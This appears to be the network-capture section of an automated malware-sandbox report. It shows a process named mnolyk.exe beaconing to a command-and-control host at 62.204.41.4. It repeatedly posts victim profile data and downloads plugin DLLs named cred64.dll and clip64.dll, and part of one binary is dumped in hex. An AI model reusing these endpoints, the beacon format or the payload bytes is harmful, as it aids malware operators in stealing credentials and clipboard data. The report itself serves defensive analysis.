                                                                      Feb 6, 2023 18:38:49.786036015 CET5036280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:49.786550999 CET5036280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:49.847816944 CET805036262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:49.850887060 CET805036262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:49.853267908 CET5036280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:49.956203938 CET5036280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:49.957103968 CET5036380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.018944979 CET805036262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.018986940 CET805036362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.019108057 CET5036280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.019141912 CET5036380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.019718885 CET5036380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.081340075 CET805036362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.084964991 CET805036362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.085191965 CET5036380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.190603971 CET5036380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.191440105 CET5036480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.251588106 CET805036362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.252090931 CET805036462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.252270937 CET5036380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.253164053 CET5036480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.253164053 CET5036480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.313800097 CET805036462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.316068888 CET805036462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.316320896 CET5036480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.425873995 CET5036480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.427228928 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.487093925 CET805036462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.487282991 CET5036480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.488315105 CET805036562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.489289999 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.493705034 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.555087090 CET805036562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.557642937 CET805036562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.561353922 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.675569057 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.676603079 CET5036680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.736437082 CET805036562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.736641884 CET5036580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.739053965 CET805036662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.739289999 CET5036680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.739823103 CET5036680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.802825928 CET805036662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.806164980 CET805036662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.806390047 CET5036680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.909356117 CET5036680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.910228968 CET5036780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.970899105 CET805036762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.971005917 CET5036780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:38:50.971847057 CET805036662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:38:50.971935034 CET5036680192.168.2.762.204.41.4
                                                                      • 62.204.41.4
                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.74972462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:35:56.006951094 CET336OUTGET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                                                                      Host: 62.204.41.4
                                                                      Feb 6, 2023 18:35:56.069925070 CET337INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:56 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 162
                                                                      Connection: keep-alive
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.74972562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:35:56.007021904 CET337OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:56.075514078 CET337INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0
                                                                      Feb 6, 2023 18:35:56.099328995 CET338OUTGET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                                                                      Host: 62.204.41.4
                                                                      Feb 6, 2023 18:35:56.161401987 CET339INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:56 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 91136
                                                                      Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                                                                      Connection: keep-alive
                                                                      ETag: "63dd4219-16400"
                                                                      Accept-Ranges: bytes
                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,CyCyCy~Iy~y~Qy~Ly~Ry~by~FyCyy~@y~ByBy~ByRichCyPEL8c!>@J<K<T ?p?@,.textV `.rdataab@@.dataD`D@.rsrcP@@.relocTR@B
                                                                      Feb 6, 2023 18:35:56.161428928 CET340INData Raw: 00 00 00 00 6a 20 68 a8 3c 01 10 b9 70 68 01 10 e8 3f 23 00 00 68 00 ea 00 10 e8 8c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 88 68 01 10 e8 1f 23 00 00 68 60 ea 00 10 e8 6c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 a0 68 01 10 e8 ff
                                                                      Data Ascii: j h<ph?#h*Yj8h<h#h`l*Yj8h<h"hL*Yj8h<h"h ,*Yj8h=h"h*Yj0hD=h"h)Yj0hx=i"h@)Yhh=i
                                                                      Feb 6, 2023 18:35:56.161452055 CET342INData Raw: 7d f0 10 8d 45 dc 0f 43 45 dc 0f be 04 18 8b 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 1f 1b 00 00 8b 55 ec 83 ef 08 8b 4d f8 43 3b da 72 c2 8b 45 f8 85 c0 74 0e 68 00 04 00 00 50 e8 f0 21 00 00 83 c4 08
                                                                      Data Ascii: }ECEt'xMPUMC;rEthP!Ur(MBrI#+wVRQ!UEEEr(MBrI#+wRQ~!E_^[]GU4E0SVW3E
                                                                      Feb 6, 2023 18:35:56.161468983 CET343INData Raw: 23 52 51 e8 31 1d 00 00 83 c4 08 33 f6 e9 74 ff ff ff 52 51 e8 20 1d 00 00 83 c4 08 5f 8b c6 5e 8b e5 5d c3 e8 3f 43 00 00 e8 4a 1a 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 8b 55 1c 8b 4d 08 56 85 c0 0f 84 82 00 00 00 53 40 57 50
                                                                      Data Ascii: #RQ13tRQ _^]?CJUQEUMVS@WP] M}CM+IDuNFu+FVjVSWP5WjWj UM_[^r%BrI#+wRQ
                                                                      Feb 6, 2023 18:35:56.161482096 CET344INData Raw: 10 72 2d 8b 4c 24 40 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f8 10 00 00 52 51 e8 06 18 00 00 83 c4 08 8b 0d e4 68 01 10 83 f9 10 72 2e a1 d0 68 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83
                                                                      Data Ascii: r-L$@BrI#+RQhr.hArP#+QPD$`hhL$Dh~D$tfhQT$DL$dT$Xr-L$@BrI#+PRQ^hr.hArP
                                                                      Feb 6, 2023 18:35:56.161519051 CET346INData Raw: 00 00 8a 41 02 3a 42 02 75 0f 83 7c 24 1c ff 74 7b 8a 41 03 3a 42 03 74 73 83 ff 25 73 6e 83 ce 02 c7 44 24 50 00 00 00 00 b9 01 00 00 00 89 74 24 18 3b f9 c7 44 24 54 0f 00 00 00 8d 44 24 20 c6 44 24 40 00 0f 42 cf 83 7c 24 34 10 51 0f 43 44 24
                                                                      Data Ascii: A:Bu|$t{A:Bts%snD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu81u|$0D$|$0L$@T$TD$D$t9D$r-BrI#+LRQZD$ T$tD$r-L$`B
                                                                      Feb 6, 2023 18:35:56.161560059 CET347INData Raw: 6c 8b c7 83 e8 04 89 44 24 1c 72 19 8b 01 3b 02 75 1c 8b 44 24 1c 83 c1 04 83 c2 04 83 e8 04 89 44 24 1c 73 e7 83 f8 fc 0f 84 bd 00 00 00 8a 01 3a 02 75 39 83 7c 24 1c fd 0f 84 ac 00 00 00 8a 41 01 3a 42 01 75 26 83 7c 24 1c fe 0f 84 99 00 00 00
                                                                      Data Ascii: lD$r;uD$D$s:u9|$A:Bu&|$A:Bu|$A:Bt~GwvD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu0xf90u|$0D$|$0L$@T$T
                                                                      Feb 6, 2023 18:35:56.161581039 CET348INData Raw: fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f1 01 00 00 52 51 e8 ff 08 00 00 83 c4 08 80 7c 24 17 00 74 17 83 ec 18 8b cc 68 00 69 01 10 e8 35 04 00 00 e8 e0 eb ff ff 83 c4 18 8b 74 24 18 83 ec 18 8b cc 81 ce 00 10 00 00
                                                                      Data Ascii: rI#+RQ|$thi5t$t$0hiL$xWxr|$4L$ CL$ ;xudD$r;uD$D$s:u1|$A:Bu|$tzA:Bu|$tkA:Btc_u^
                                                                      Feb 6, 2023 18:35:56.161598921 CET349INData Raw: 0e 50 57 51 e8 41 1d 00 00 8b 45 08 83 c4 0c 89 46 10 8b c6 89 5e 14 5f 5e 5b 5d c2 04 00 e8 97 de ff ff e8 22 2a 00 00 cc cc 55 8b ec 51 53 56 8b f1 57 8b 7d 0c 8b 4e 14 89 4d fc 3b f9 77 28 8b de 83 f9 10 72 02 8b 1e 57 ff 75 08 89 7e 10 53 e8
                                                                      Data Ascii: PWQAEF^_^[]"*UQSVW}NM;w(rWu~S";_^[]v+;v;BC=r%H#;QtwA#HtPm3WuEP~^
                                                                      Feb 6, 2023 18:35:56.161617994 CET351INData Raw: 00 50 e8 bc 2e 00 00 59 85 c0 74 03 32 c0 c3 e8 a2 30 00 00 b0 01 c3 6a 00 e8 d0 00 00 00 84 c0 59 0f 95 c0 c3 e8 cc 0c 00 00 84 c0 75 03 32 c0 c3 e8 0c 35 00 00 84 c0 75 07 e8 c2 0c 00 00 eb ed b0 01 c3 e8 04 35 00 00 e8 b3 0c 00 00 b0 01 c3 55
                                                                      Data Ascii: P.Yt20jYu25u5Uu}uuMPu,Uuu'YY]cth,j3Y!+*j4YnU}u(jOu2]T4uj%Y]U=
                                                                      Feb 6, 2023 18:35:56.223263025 CET352INData Raw: 00 00 00 53 57 ff 75 08 e8 b1 f8 ff ff 8b f0 89 75 e4 83 ff 01 75 22 85 f6 75 1e 53 50 ff 75 08 e8 99 f8 ff ff 53 56 ff 75 08 e8 64 fd ff ff 53 56 ff 75 08 e8 6a 00 00 00 85 ff 74 05 83 ff 03 75 48 53 57 ff 75 08 e8 47 fd ff ff 8b f0 89 75 e4 85
                                                                      Data Ascii: SWuuu"uSPuSVudSVujtuHSWuGut5SWuD$MQ0h:uuue3uEMdY_^[UV5u3@uuu,^]U}uuuu]


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      10192.168.2.74973462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:00.024734020 CET442OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:00.093935013 CET442INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      100192.168.2.74982562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:23.646591902 CET538OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:23.710850954 CET539INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      101192.168.2.74982662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:23.882734060 CET539OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:23.947952032 CET540INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      102192.168.2.74982762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:24.116180897 CET540OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:24.180759907 CET541INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      103192.168.2.74982862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:24.349766970 CET541OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:24.414799929 CET542INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      104192.168.2.74982962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:24.582432032 CET542OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:24.644867897 CET543INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      105192.168.2.74983062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:24.829107046 CET543OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:24.891784906 CET544INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
